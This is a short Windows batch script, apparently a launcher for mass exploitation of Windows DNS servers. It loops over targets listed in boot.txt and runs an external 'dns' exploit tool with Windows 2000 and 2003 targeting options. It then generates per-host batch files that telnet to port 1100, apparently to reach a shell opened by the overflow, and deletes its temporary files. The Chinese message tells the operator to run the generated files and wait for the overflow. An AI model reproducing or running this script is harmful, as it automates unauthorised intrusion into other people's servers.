@echo=================================================================================
@pause
@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%dns -t2000all %%i %%j
@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%dns -t2003eng %%i %%j
@goto yichu
:yichu
@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt
@for /F "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat
@del s.txt
@del a.txt
@del 3.txt
@echo=================================================================================
@echo 运行生成的批处理 等待溢出…………
@echo=================================================================================
@pause









